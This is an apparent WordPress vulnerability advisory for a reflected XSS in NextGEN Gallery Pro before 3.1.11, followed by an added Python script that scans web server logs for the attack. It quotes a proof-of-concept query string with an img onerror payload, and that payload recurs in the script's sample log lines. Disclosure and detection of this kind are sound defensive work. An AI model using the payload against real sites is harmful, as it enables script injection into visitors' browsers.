wpexploit
ThuraMoeMyint
WPEX-ID: 5E1A4725-3D20-44B0-8A35-BBF4263957F7
History: Feb 24, 2021 - 12:00 a.m.

NextGEN Gallery Pro < 3.1.11 - Reflected Cross-Site Scripting (XSS)

In the eCommerce module of NextGEN Gallery Pro, the get_cart_items action can be called via photocrati_ajax. In that request, the settings[shipping_address][name] parameter can be used to inject malicious JavaScript.

On a page where a NextGEN (Pro) gallery is embedded:

?photocrati_ajax=1&action=get_cart_items&cart=&settings[shipping_address][name]=a%3Cimg%20src=x%20onerror=alert('XSS')%3E
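
A detection sketch for web server access logs, added here as an example and not part of the original advisory or the plugin's code: it flags get_cart_items requests sent through photocrati_ajax whose settings[...] parameters carry markup, including requests where the brackets in the parameter name are percent-encoded. The combined log format, the function names and the sample log lines are assumptions constructed for illustration; only query-string parameters are visible in such logs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markup characters or an inline event handler in a decoded parameter value.
MARKUP = re.compile(r"[<>]|\bon\w+\s*=", re.IGNORECASE)
# Request target inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def flagged_params(uri):
    """Return settings[...] parameter names carrying markup in a
    photocrati_ajax get_cart_items request, or [] for any other request."""
    # parse_qsl percent-decodes names and values, so settings%5B...%5D and
    # settings[...] are treated as the same parameter.
    params = parse_qsl(urlsplit(uri).query, keep_blank_values=True)
    names = dict(params)
    if "photocrati_ajax" not in names or names.get("action") != "get_cart_items":
        return []
    return [k for k, v in params
            if k.startswith("settings[") and MARKUP.search(v)]


def scan(lines):
    """Return (line_number, uri, flagged_parameter_names) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            flagged = flagged_params(match.group(1))
            if flagged:
                hits.append((number, match.group(1), flagged))
    return hits


# Constructed sample log lines (not real traffic); the payload is the one
# quoted in the advisory above.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Feb/2021:10:00:00 +0000] "GET /gallery/?photocrati_ajax=1&action=get_cart_items&cart=&settings[shipping_address][name]=Alice HTTP/1.1" 200 512',
    '203.0.113.9 - - [24/Feb/2021:10:01:00 +0000] "GET /gallery/?photocrati_ajax=1&action=get_cart_items&cart=&settings[shipping_address][name]=a%3Cimg%20src=x%20onerror=alert(\'XSS\')%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [24/Feb/2021:10:02:00 +0000] "GET /portfolio/?photocrati_ajax=1&action=get_cart_items&cart=&settings%5Bshipping_address%5D%5Bname%5D=a%3Cimg%20src=x%20onerror=alert(\'XSS\')%3E HTTP/1.1" 200 640',
    '203.0.113.7 - - [24/Feb/2021:10:03:00 +0000] "GET /?s=%3Cb%3E HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for number, uri, flagged in scan(SAMPLE_LOG):
        print(f"line {number}: {flagged} in {uri}")
```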